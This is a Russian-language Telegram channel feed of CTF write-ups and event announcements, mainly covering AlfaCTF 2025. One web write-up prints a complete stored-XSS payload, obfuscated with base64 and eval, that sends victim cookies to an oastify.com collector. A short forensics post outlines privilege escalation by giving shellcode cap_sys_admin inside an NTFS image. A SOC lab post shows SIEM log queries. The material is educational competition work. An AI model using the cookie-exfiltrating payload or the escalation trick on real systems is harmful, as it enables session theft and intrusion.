Райтапы по CTF{2025}
2.83K subscribers
215 photos
25 videos
87 files
393 links
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш ламповый чатик: @writeup_chat

✍️ По любому вопросу можно писать мне: @freenameruuuu

Таски решать тут: @writeup_ctf_bot
Download Telegram
#alfactf2025

Фиксы в лучах заката, автор @purplesyringa

NTFS поддерживает дофига POSIX-совместимых фич в духе разрешений (хочется setuid), но разрешения без -o permissions никак ни на что не влияют, поэтому надо искать какой-то другой способ повысить привилегии.

Утверждается, что
а) ntfs-3g поддерживает эмулияцию xattrs, б) capabilities файлов хранятся в xattrs

т.е. можно создать образ, где шеллкоду повышены разрешения через setcap cap_sys_admin=eip mnt/shellcode, и потом этот бинарь можно запустить на машине

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
9
Цунами_дедлайнов_Решение_@THL_1xBtc.pdf
266.7 KB
#web #alfactf2025
Студенческая лига

Цунами дедлайнов автор @THL_1xBtc

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7
#web #alfactf2025

Возвращение стены, автор @Dan1Lev

Точек для XSS тут хватает, это аватар, имена файлов и username. Возможно есть ещё, но не проверял использовал только аватар.

На endpoint /avatar отправляется параметр avatar_url в который можно передать например такую нагрузку
" onerror=alert(1); "

Защита есть только со стороны фронта которая даст отправить только url.

Но для получения флага понимания куда загружать не достаточно, нужно изучить поведение бота.
Бот переходит на нашу страницу если набирается 3 поста, запоминает последний пост, переходит на главную где проходит авторизацию и публикует запомненный пост с нашей страницы.
Флаг добавляется к куки в начале авторизации. Содержимое поста не уязвимо к инъекциям.
Нужно заставить бота остаться на нашей странице. Для этого выдадим ему куки нашего аккаунта с помошью следующей нагрузки к которой был добавлен сбор куки.
" onerror=eval(atob("ZG9jdW1lbnQuY29va2llID0gImFjY2Vzc190b2tlbj1leUpoYkdjaU9pSklVekkxTmlJc0luUjVjQ0k2SWtwWFZDSjkuZXlKemRXSWlPaUpFWVc1TVpYWXhNek0zSWl3aVpYaHdJam94TnpZd05EVXhPRGd3ZlEuOElQTFh3NjZSWjZnbVl2dmtKV2w5a01fRndFdzhseFVTYWI2dDVZV3NSRTsgcGF0aD0vIjsKZmV0Y2goImh0dHBzOi8vaDBpbjYzeXV6Z281MGx0MmUzaDNvejExYXNnajRiczAub2FzdGlmeS5jb20vP2M9Iitkb2N1bWVudC5jb29raWUpOw==")); "

Содержимое eval
document.cookie = "access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJEYW5MZXYxMzM3IiwiZXhwIjoxNzYwNDUxODgwfQ.8IPLXw66RZ6gmYvvkJWl9kM_FwEw8lxUSab6t5YWsRE; path=/";
fetch("https://h0in63yuzgo50lt2e3h3oz11asgj4bs0.oastify.com/?c="+document.cookie);


Но и этого не достаточно. Да, бот будет авторизован, но не найдя на странице форму авторизации бот остановится, в добавок куки добавляется после загрузки страницы.
Для обхода нуно добавить фиктивную форму
<form id="login-form"><input name="username"/><input name="password"/><button></button></form>

Дополнительно бот проверяет есть ли в url /profile/, но это не проблема т.к. авторизованный аккаунт автоматически будет редиректится в профиль.

Финальная нагрузка
"onerror=eval(atob("ZG9jdW1lbnQuY29va2llID0gImFjY2Vzc190b2tlbj1leUpoYkdjaU9pSklVekkxTmlJc0luUjVjQ0k2SWtwWFZDSjkuZXlKemRXSWlPaUpFWVc1TVpYWXhNek0zSWl3aVpYaHdJam94TnpZd05EVXhPRGd3ZlEuOElQTFh3NjZSWjZnbVl2dmtKV2w5a01fRndFdzhseFVTYWI2dDVZV3NSRTsgcGF0aD0vIjsKZmV0Y2goImh0dHBzOi8vaDBpbjYzeXV6Z281MGx0MmUzaDNvejExYXNnajRiczAub2FzdGlmeS5jb20vP2M9Iitkb2N1bWVudC5jb29raWUpOw=="));><form id="login-form"><input name="username"/><input name="password"/><button></button></form><img src="


После установки создаём 3 поста и спустя мгновение получаем куки с флагом

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
82
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥124
Please open Telegram to view this post
VIEW IN TELEGRAM
92
Подборка райтапов с прошедшего AlfaCTF:

Задания кстати все еще доступны
https://alfactf.ru/tasks

🛡 Защита от спама
(https://t.me/writeup_ctf/784)
#Easy #Infra #Web

🎶 Звуки ностальгии
(https://t.me/writeup_ctf/783)
#Easy #Misc #OSINT

🌊 Цунами дедлайнов
(https://t.me/writeup_ctf/793)
#Easy #Web

🌈🎛 Кислотный ретровейв
(https://t.me/writeup_ctf/786)
#Easy #Web

🌴💰 Пальма с биткоинами
(https://t.me/writeup_ctf/785)
#Easy #Web #JS

👨‍💻🏖 Разработчик на пляже
(https://t.me/writeup_ctf/790)
#Medium #Infra #Dev #Pentest

🎵🌀 Вихрь рик-ролла
(https://t.me/writeup_ctf/789)
#Medium #Web #Logic

🐺🌊 Шакализация волны
(https://t.me/writeup_ctf/788)
#Medium #Web #OAuth #Client

📹🚁 Десант блогеров
(https://t.me/writeup_ctf/787)
#Medium #Web #Logic

🌇🛠 Фиксы в лучах заката
(https://t.me/writeup_ctf/792)
#Hard #Forensics #Linux #Infra #LPE

🥒😈 Дикий огурец
(https://t.me/writeup_ctf/791)
#Hard #Pwn #Python

🏍⚡️ Непослушный мотоциклист
(https://t.me/writeup_ctf/795)
#Hard #Coding #Reverse #Network

🧱🔙 Возвращение стены
(https://t.me/writeup_ctf/794)
#Hard #Web #Client

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1433
Please open Telegram to view this post
VIEW IN TELEGRAM
1101
😺 CyberCamp 20–25 октября

💡Подача заявок до 9 октября
Модерация и отбор до 17 октября
Всего будет 1000 участников киберучений.

Об учениях:
CyberCamp — это проект по обмену практическим опытом в сфере кибербезопасности. Мы создали новый формат онлайн-мероприятий: участвовать в киберучениях и проходить задания могут не только команды, но и все зрители кэмпа.

Каждый год в рамках CyberCamp проводится онлайн-конференция федерального масштаба и цикл митапов для начинающих и опытных специалистов. Мы создаем среду для повышения экспертизы в ИБ и развиваем комьюнити, в котором можно поделиться знаниями и найти поддержку

Доклады и практические задания для CyberCamp готовят участники комьюнити — пентестеры, форензеры, инженеры и архитекторы ИБ, аналитики SOC. Задания основаны на кейсах из повседневной работы Blue team, Red team и Yellow team.

➡️Ссылка на регу [клик]

📝 Мой опыт участия:
Задания подъемные, интересные, платформа работает хорошо. Можно потыкать разные инструменты. Основной упор был на BlueTeam. Сложно было совмещать просмотр докладов и решать задачи, но всегда делают запись, можно потом нонстопом просмотреть интересное. В этом году можно учавствовать в соло

➡️Архив прошлогодних докладов [клак]
Please open Telegram to view this post
VIEW IN TELEGRAM
1610🔥51
Forwarded from СНО ВШК
💜 NeoQUEST-2025 💜

Уже 26 сентября Высшая школа кибербезопасности СПбПУ устроит глубокое погружение в мир кибербезопасности — «Очная ставка» NeoQUEST-2025!

В программе:
🟣 доклады
🟣 конкурсы
🟣 воркшопы
🟣 призы и подарки

Вход свободный!
Бесплатный трансфер до мероприятия в 11:00 от станции метро Политехническая.

📌 Подробности и ссылка на регистрацию на сайте

🗺 Брусницын Холл, Кожевенная линия, дом 30
🗓 26 сентября, 12:00

СНО ВШК 🔐
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥92
Все прошло супер!
224
Forwarded from antiSOCial
Привет!
Давно меня не было в уличных гонках🚗, а новые задания на Cyberbones сами себя не решат.
Нужно исправлять🖕

Небезопасное хранение данных / Задание 7.1
Укажите имя рабочей станции эйчара, на которой хранится файл с паролем.

Из предыстории нам известно, что злоумышленнику удалось повысить привилегии от имени УЗ HR'a, воспользовавшись паролем администратора b_rivers_admin.
Составим фильтр, где УЗ-объектом будет УЗ админа и действием повышение привилегий:
object.account.name = "b_rivers_admin" and action = "elevate"

Получили пачку событий 4648 с хоста comp-2159.hv-logistics.stf, где процесс-субъект входа имеет следующий путь: с:\users\d_jensen\documents\runascs_net2.exe
Ответ: comp-2159.hv-logistics.stf

Небезопасное хранение данных / Задание 7.2
Приведите пароль учетной записи b_rivers_admin.

Нам уже известен хост, процесс, имя УЗ-субъекта/объекта. Но как найти пароль? Прежде всего, необходимо разобраться что за тулзу использует злоумышленник. Видно, что этот инструмент представляет собой улучшенную версию утилиты runas.exe, которая устраняет некоторые ограничения, самое главное из которых- это использование пароля в команде.
Осталось выполнить поиск по командной строке, использовав всю найденную информацию:
event_src.host = "comp-2159.hv-logistics.stf" and object.name = "runascs_net2.exe" and subject.account.name = "d_jensen" and object.process.cmdline contains "b_rivers_admin"

В результате, получаем событие с командной строкой: RunasCs_net2.exe B_Rivers_admin -p zY2oWqz2qn3Ne71W "whoami" -d hv-logistics.stf
Ответ: zY2oWqz2qn3Ne71W

Небезопасное хранение данных / Задание 7.3
Укажите имя файла из фишинговой рассылки, открытие которого привело к развитию атаки.

Вводной информации о письме и его содержании у нас нет, поэтому необходимо рассуждать логически.
У нас есть хост, имя УЗ и факт запуска какого-то файла, в последствии которого атака начала своё развитие.
Обычно, при фишинге используются документы .doc/.docx или таблицы .xls/.xlsx/.xlsm с макросами, поэтому нужно поискать их (период времени лучше расширить на сутки до):
event_src.host = "comp-2159.hv-logistics.stf" and (object.process.cmdline contains ".doc" or object.process.cmdline contains ".xls") and action = "start" and subject.account.name = "d_jensen"

Получили множество событий с документами из папки C:\\Attachments, которые открываются двумя способами: winword.exe и cmd /c start. Теперь, когда мы знаем путь и то, что при запуске этого документа, что-то происходит (является родительской командной строкой, которая вызывает ту или иную активность в результате работы макроса), произведем поиск по object.process.parent.cmdline:
event_src.host = "comp-2159.hv-logistics.stf" and object.process.parent.cmdline contains "C:\Attachments" and (object.process.parent.cmdline contains ".doc" or object.process.parent.cmdline contains ".xls") and action = "start" and subject.account.name = "d_jensen"

Сделаем сортировку по object.process.cmdline и отметем события, в которых командная строка содержит такую же команду с запуском файла (все команды с winword.exe и .doc/.docx документами)
event_src.host = "comp-2159.hv-logistics.stf" and object.process.parent.cmdline contains "C:\Attachments" and object.process.parent.cmdline not contains ".doc" and object.process.parent.cmdline not contains "winword.exe" and action = "start" and subject.account.name = "d_jensen"

Получили 4 события с разными .xls файлами. Убираем хэш (32 символа) и получаем чистое название файла. После подбора, получаем правильный ответ.
Ответ: book_withcob.xls

P.S. там еще раздел "Атаки" завезли, ждите разбор🧐
Please open Telegram to view this post
VIEW IN TELEGRAM
742
Вот ещё вам небольшая андеграунд ctf платформа. Всем хакать

https://ctf.bug-makers.ru/

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥94
Доброе утро, кибердрузья! 🥰

Неделя выдалась спокойной, зато на горизонте сразу много интересного — особенно для тех, кто любит пробовать новое и открывать для себя редкие турниры со всего мира. Вот что стоит взять на карандаш 💻

POC CTF Qualification 2025
🕖 12 октября 13:00 — 13 октября 13:00
📍 CTFTime | Официально
Отборочный CTF на легендарную POC Security Conference в Южной Корее! Формат индивидуальный. Проходит в первый раз, сказать что нибудь сложно, но обязательно загляните в обучающий раздел конференции — тренинги и доклады на высоте.

QnQSec CTF 2025
🕖 16 октября 21:00 — 19 октября 21:00
📍 CTFTime | Официально
Дебютный турнир от QnQSec (Иордания). Про них очень много хороших слов в локальном комьюнити Ближнего Востока. В том числе, за обучение и поддержку. Заявлены очень хорошие призы, правда, сайт CTF ещё не работает 🙈

❗️ Hack.lu CTF 2025
🕖 17 октября 21:00 — 19 октября 21:00
📍 CTFTime | Официально
Самый ожидаемый турнир этой недели! Одно из самых известнейших соревнований в мире CTF! Уже 15-й (!) турнир от FluxFingers (Германия, Рурский университет). Обязательно поучаствуйте, будет интересно!

LINE CTF 2025
🕖 18 октября 03:00 — 19 октября 03:00
📍 CTFTime | Официально
Пятый год подряд японские организаторы удивляют интересными, свежими задачами. Попробовать стоит обязательно 👨‍💻

H7CTF 2025
🕖 18 октября 06:30 — 19 октября 18:30
📍 CTFTime | Официально
Из уникального в этой CTF - это наличие Boot2Root задач! Старенький writeup на такую задачу

WebArena
🕖 18 октября 15:30 — 19 октября 15:30
📍 CTFTime | Официально
Мероприятие проводит CSEM. Аналог нашего Codeby. Крутая платформа для личной практики — 38 учебных курсов, индивидуальный формат

❗️ КиберОлимп 2025 (отбор)
🕖 18 октября 12:11 — 18:11
📍 Официально
К участию приглашаются учащиеся образовательных организаций высшего и среднего профессионального образования. Формат участия индивидуальный. Финал состоится 27 и 28 ноября в Самаре на базе ПГУТИ.
Очень сильно не нравится доп ограничение:: от одного ВУЗа на финале может быть представлено не более 2 человек.


и дополнительно у нас в обзоре представлен

🌱 INGOSight — конкурс для студентов от Ингосстрах
Для участия не обязательно быть IT-гуру — здесь реальный шанс попробовать себя в бизнес-аналитике, продуктовой работе и даже финансах. Нужно собрать команду, предложить идею для сферы благополучия (здоровье, финансы, путешествия, жильё), доказать её жизнеспособность и создать прототип!
Подробнее

Желаем вам уверенности, новых знаний и приятных сюрпризов на каждом CTF! 😘 Набирайте опыт — и пусть удача будет на вашей стороне!

#CTF #Анонс #Планы #Календарь
Please open Telegram to view this post
VIEW IN TELEGRAM
9